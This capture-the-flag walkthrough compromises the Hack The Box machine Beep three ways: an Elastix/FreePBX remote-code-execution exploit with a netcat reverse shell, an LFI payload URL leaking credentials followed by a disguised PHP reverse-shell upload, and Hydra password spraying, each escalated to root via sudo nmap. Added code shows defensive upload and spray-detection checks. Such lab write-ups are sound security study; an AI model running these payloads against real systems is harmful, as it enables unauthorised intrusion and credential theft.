Hack The Box: Beep Write-up (#2)

Let’s begin!

Reconnaissance

We start with a quick nmap scan.

nmap -sC -sV -O -oA nmap/basic 10.10.10.7
  • -sC: Run the default nmap scripts
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats

We got the following results:

  • Port 22 — Running SSH service of version OpenSSH 4.3 (protocol 2.0)
  • Port 25 — Running Simple Mail Transfer Protocol (SMTP) Postfix smtpd
  • Port 80 — Running Web Service Apache httpd 2.2.3
  • Port 110 — Running Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
  • Port 111 — Running rpcbind service
  • Port 143 — Running Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
  • Port 443 — Running Web Service over SSL (HTTPS) Apache httpd 2.2.3
  • Port 993 — Running Cyrus imapd over SSL
  • Port 995 — Running Cyrus pop3d over SSL
  • Port 3306 — Running MySQL (version not identified)
  • Port 4445 — Running upnotifyp
  • Port 10000 — Running MiniServ 1.570 (Webmin httpd)
Nmap basic scan result

We need to run a full nmap scan to make sure we did not miss any ports.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.7
  • -p-: scan all ports from 1–65535

We got the following results:

  • Port 877 — Running rpcbind service
  • Port 4190 — Running Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
  • Port 4559 — Running HylaFAX 4.3.10
  • Port 5038 — Running Asterisk Call Manager 1.1
Nmap full scan result

Again, you can see that the quick nmap scan did not show the above 4 ports, so make the full scan a habit. Last, we go for the UDP nmap scan.

nmap -sU -O -p- -oA nmap/udp 10.10.10.7

The UDP scan takes forever. This is because UDP has no handshake: an open port often sends nothing back, and a closed port answers with an ICMP port-unreachable message that most hosts rate-limit, so nmap has to wait and retry for every port. We can speed up this scan with timing options, but there is a risk of reducing the accuracy of your scan. If you are interested, you can read about the timing options in the nmap documentation. So I skipped this scan.

Service Enumeration

I always like to start enumerating with the common service ports that have the highest chance of giving access to the target. Let’s begin with the web server.

Visiting the URL on port 80 redirects us to port 443 (HTTPS), which shows the login form of an Elastix application.

Elastix application login page

A quick Google search for “Elastix” reveals it is a unified communications server that links together IP PBX, email, IM, faxing and collaboration functionality. An IP PBX is a Voice over IP (VoIP) phone system for business. So this Beep box seems to be related to a phone system. I tried to log in to this page with default credentials but it didn't work. I also checked “View Page Source” for hints, but nothing interesting is there. Let’s run dirb to enumerate web directories.

dirb https://10.10.10.7/

We got the following outputs:

Dirb scan result

After enumerating all the above directories, /admin and /vtigercrm seem to be the interesting ones. Let’s access them.

Admin page

I tried default credentials for this page and they did not work either. But I got the version information: FreePBX 2.8.1.4. Let’s search for CVE information and exploits. Google didn't give much CVE information for this version, but searchsploit gives a list, and one exploit in particular is linked to the Elastix software. We will test this in the Exploitation section.

Searchsploit result

Next, we access to /vtigercrm.

VTiger CRM

We got the version number: vtiger CRM 5.1.0. Let’s Google this version for CVEs and exploits. This version of vtiger CRM is vulnerable to Local File Inclusion (LFI): see CVE-2012-4867 and the accompanying exploit.

So I leave this here for now, and let’s move to the next web service port.

Let’s access to the URL with port 10000.

Login page

We got this login page. I tried default passwords, and it blocked access after 5 failed attempts; after 2 to 3 minutes, it unblocks automatically. I also checked “View Page Source” and nothing interesting is there.

Let’s do a quick telnet to the mail service on port 25.

telnet 10.10.10.7 25
Telnet to port 25

Good! The email service is working, and we can see that our test email has been queued. We will come back and attack this if the other services do not get us access to the target.

Ports 110, 143, 993 and 995 are the POP3 and IMAP services that mail clients use to access email remotely. We need valid credentials to log in to these services, so we will come back to them if we find any credentials in a later section.

Ports 111 and 877 are used by the rpcbind service. Let’s see if there is anything interesting by executing the following command:

rpcinfo -p 10.10.10.7
Rpcinfo result

As expected, nothing further could be enumerated.

Port 4559 is HylaFAX, open-source fax server software. A Google search for “HylaFAX 4.3.10” didn't show any CVEs or exploits.

Port 5038 is the Asterisk Call Manager interface. A quick search shows it is used to manage calls: transferring calls, maintaining the current call session and controlling the VoIP phone system. I didn't find any CVEs or exploits.

For MySQL, I couldn't find the version information. I also tried the nmap MySQL scripts to enumerate it, but they did not work. So I skipped this.

Port 4445 (upnotifyp): I didn't find much info on this port.

With that information, let’s begin our attack.

Exploitation

Method #1

Let’s download the exploit “FreePBX 2.10.0 / Elastix 2.2.0 — Remote Code Execution” to our Kali machine.

searchsploit -m exploits/php/webapps/18650.py

We have to edit this code to skip SSL certificate verification; otherwise the script fails with an SSL error.

Fix for SSL verification issue

In the above screenshot, I have added the fix. Update lhost, lport and rhost to match your setup. One more thing: you need to find a valid extension for this exploit to work. I used the default 1000 as in the exploit and it did not work.

The response fails for the default extension 1000

I used the svwar tool from the SIPVicious GitHub project to automate finding a valid extension that gets a response.

svwar -m INVITE -e100-500 10.10.10.7

We got the following result.

svwar result

Let’s update our exploit with 233 as the extension value. Alternatively, we can find the extension by sending the request to Burp Intruder, but you need to be patient for the outcome. Mark your payload position as in the screenshot below.

Payload position

Add your payload value to the list and start the attack.

You will get a different response when the valid extension value is hit.

Burp Intruder result

We are good to go to the next step.

On your Kali Linux, set up a netcat listener on port 4444.

nc -nlvp 4444

Execute the Python exploit.

python 18650.py
Netcat listener

We got the shell. Let’s upgrade it to a fully interactive shell. Execute this Python one-liner.

python -c 'import pty; pty.spawn("/bin/bash")'
Reverse shell

Then send this shell to the background by pressing CTRL+Z. After that, execute the command below.

stty raw -echo;fg
Reverse shell to fully interactive shell

Now we have a fully interactive shell with tab completion. Next, let’s escalate privileges to root, following the method described in the exploit.

Exploit code

It seems user asterisk is in the sudoers list. Let’s check that.

Sudoer options for the user asterisk

That's right. Let’s use nmap interactive mode and get the root shell.

sudo nmap --interactive
Root shell

Nice!

Grab the root flag.

Root flag

Grab the user flag.

User flag

Method #2

We use the LFI vulnerability in the /vtigercrm page. From Exploit-DB (refer to the exploit link shared earlier) we copy the payload and paste it into the URL.

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

We got the following result.

LFI result

We can send this request to Burp Repeater and get the response in a nice format.

LFI via Burp Repeater
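An LFI of this kind works because the application splices module_name into a file path without checking it, and the trailing %00 truncates the string in PHP releases of that era, so the suffix the code appends is dropped. The following Python is an added example, not code from the post or from vtiger CRM: it models that vulnerable pattern under a hypothetical modules directory, shows what the payload above resolves to, and gives a path check that rejects it.

```python
import os
from typing import Optional

# Hypothetical layout and allow list, constructed for the demo; the real
# application's paths are not taken from the post.
MODULES_DIR = "/var/www/html/vtigercrm/modules"
KNOWN_MODULES = {"Accounts", "Contacts", "Leads"}

def vulnerable_include_path(module_name: str) -> str:
    # The unchecked pattern behind an LFI: user input is spliced straight
    # into a file path that is later handed to include().
    return MODULES_DIR + "/" + module_name + "/language/en_us.lang.php"

def effective_path_after_null_truncation(path: str) -> str:
    # Models the C-level string handling in PHP of that era: the filesystem
    # call stops at the first NUL byte, so "%00" drops the appended suffix
    # and the "../" segments climb out of MODULES_DIR.
    return os.path.normpath(path.split("\x00", 1)[0])

def safe_module_path(module_name: str) -> Optional[str]:
    """Return the include path for a known module, or None if the name is unsafe."""
    # 1. A NUL byte never belongs in a module name; reject before touching the filesystem.
    if not module_name or "\x00" in module_name:
        return None
    # 2. Allow list: only names the application itself defines.
    if module_name not in KNOWN_MODULES:
        return None
    # 3. Defence in depth: canonicalise and confirm the result stays under the base.
    base = os.path.realpath(MODULES_DIR) + os.sep
    candidate = os.path.realpath(
        os.path.join(MODULES_DIR, module_name, "language", "en_us.lang.php")
    )
    return candidate if candidate.startswith(base) else None
```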

We take note of the user names that have /bin/bash as their shell. We will use these for SSH login using a technique called “Password Spraying” with Hydra, a remote network brute-force password cracking tool.

Let’s find the location of the Asterisk configuration file, since this LFI runs in the context of the asterisk user. As per the software documentation, the location is /etc/asterisk/manager.conf. Let’s read its content through the LFI.

We get back the following result.

Content of asterisk configuration

Now we have a secret from manager.conf. Let’s test it on the /vtigercrm login page with the username admin.

vtiger CRM admin page

Nice! We successfully logged in to the admin page. Let’s quickly check the Settings tab for any file upload option or server settings.

This admin page doesn’t have any server settings configured, but there is a file upload option under Settings > Company Details.

Setting Page

Kali Linux ships with web shells. You can find them here:

root@kali:~# ls -l /usr/share/webshells/php/
total 44
-rw-r--r-- 1 root root 4515 Aug 18 2015 findsock.c
-rw-r--r-- 1 root root 2800 Aug 18 2015 php-backdoor.php
-rwxr-xr-x 1 root root 3467 Aug 18 2015 php-findsock-shell.php
-rwxr-xr-x 1 root root 5491 Aug 18 2015 php-reverse-shell.php
-rw-r--r-- 1 root root 13585 Aug 18 2015 qsd-php-backdoor.php
-rw-r--r-- 1 root root 328 Aug 18 2015 simple-backdoor.php

I use php-reverse-shell.php for the reverse shell. Edit the file and change the value to your Kali Linux IP and desired port.

PHP web shell

Copy php-reverse-shell.php to php-reverse-shell.php.jpg, because the upload form only accepts files with a .jpg extension.

cp php-reverse-shell.php php-reverse-shell.php.jpg

Set a netcat listener in your Kali Linux.

nc -nlvp 4444

Now upload the php-reverse-shell.php.jpg file and click save button.

Upload PHP reverse shell payload.
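The double extension gets past an upload check that only looks at the trailing .jpg. The following Python is an added example, not part of the post or of vtiger CRM; it shows the validation an upload handler needs to reject php-reverse-shell.php.jpg, using constructed file contents and a constructed allow list of image types.

```python
import os
import secrets

# Magic bytes expected for each permitted extension (constructed allow list).
ALLOWED_TYPES = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n"}

def validate_image_upload(filename: str, data: bytes):
    """Return (accepted, reason, stored_name); stored_name is None on rejection."""
    # Strip any directory part a client may have sent ("../../shell.jpg").
    base = os.path.basename(filename.replace("\\", "/"))
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    # Checking only the last extension is the gap a ".php.jpg" name slips through.
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed", None
    # Reject multiple extensions outright: an Apache AddHandler rule keyed on
    # ".php" can still execute "shell.php.jpg" regardless of the final suffix.
    if "." in root or not root:
        return False, "multiple extensions", None
    # The content must look like the image type the name claims.
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension", None
    # Never store under the client-supplied name; generate one server-side.
    return True, "ok", secrets.token_hex(8) + ext

# Constructed inputs for the demo: a PHP payload renamed as in the post, and a JPEG header.
PHP_PAYLOAD = b"<?php echo 'not an image'; ?>"
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
```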

We got a shell in the context of user “asterisk”. Now you know what to do next: user asterisk is in the sudoers list.

Reverse shell

Again we got the root shell!

Method #3

We use the “Password Spraying” technique to test SSH logins with the discovered password using Hydra. Create a users.txt file with the usernames as below.

user.txt file

Now we are ready to run hydra.

hydra -L users.txt -p jEhdIekWmdjE 10.10.10.7 -f -v -t 4 ssh
  • -L: User list
  • -p: Password
  • -f: Exit when a login/pass pair is found
  • -v: Verbose mode
  • -t: Run TASKS number of connects in parallel per target (default: 16)
Hydra brute force
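From the defender's side, a spray like this leaves a distinctive trace in the SSH server's auth log: one source IP failing against many different accounts within seconds, sometimes followed by an Accepted password. The following Python is an added example, not from the post; it runs that check over constructed sshd log lines (the hostname, source IPs and every username other than asterisk and root are made up).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines shaped like OpenSSH's messages; the
# hostname, source IPs and most usernames are made up for the demo.
SAMPLE_LOG = """\
Mar  3 10:15:01 beep sshd[2101]: Failed password for invalid user alice from 10.10.14.5 port 40100 ssh2
Mar  3 10:15:01 beep sshd[2102]: Failed password for invalid user bob from 10.10.14.5 port 40101 ssh2
Mar  3 10:15:02 beep sshd[2103]: Failed password for asterisk from 10.10.14.5 port 40102 ssh2
Mar  3 10:15:02 beep sshd[2104]: Failed password for carol from 10.10.14.5 port 40103 ssh2
Mar  3 10:15:03 beep sshd[2105]: Accepted password for root from 10.10.14.5 port 40104 ssh2
Mar  3 10:20:00 beep sshd[2150]: Failed password for dave from 10.10.14.9 port 50000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)

def parse_auth_log(log_text):
    """Group (timestamp, result, user) events by source IP."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; a fixed year keeps ordering intact
        ts = datetime.strptime("2000 " + m["ts"], "%Y %b %d %H:%M:%S")
        events[m["ip"]].append((ts, m["result"], m["user"]))
    return events

def detect_password_spray(log_text, window_seconds=60, min_users=3):
    """Flag source IPs that failed against >= min_users distinct accounts inside
    any window_seconds span, and report which accounts they then logged in to."""
    alerts = {}
    for ip, evs in parse_auth_log(log_text).items():
        evs.sort()
        failed = [(t, u) for t, r, u in evs if r == "Failed"]
        for i, (t0, _) in enumerate(failed):
            users = {u for t, u in failed[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(users) >= min_users:
                accepted = sorted({u for _, r, u in evs if r == "Accepted"})
                alerts[ip] = {"users": sorted(users), "accepted": accepted}
                break
    return alerts
```

A single source failing against several distinct accounts in one minute is the spray signature; the same source then succeeding is the case to page on.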

Awesome! We got a successful login for the root user. Let’s test SSH now.

SSH into Beep box

Nice! It seems the same password is reused for many logins.

I tested the https://10.10.10.7:10000 webmin page with username as root and password as jEhdIekWmdjE and it works.

Great! I have shown you 3 different ways to get into the Beep box and escalate privileges to root.

Attack Strategy Map

I summarised my attack vectors in this map.

Strategy map

Thank you for reading :-) Next box is the Shocker.

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.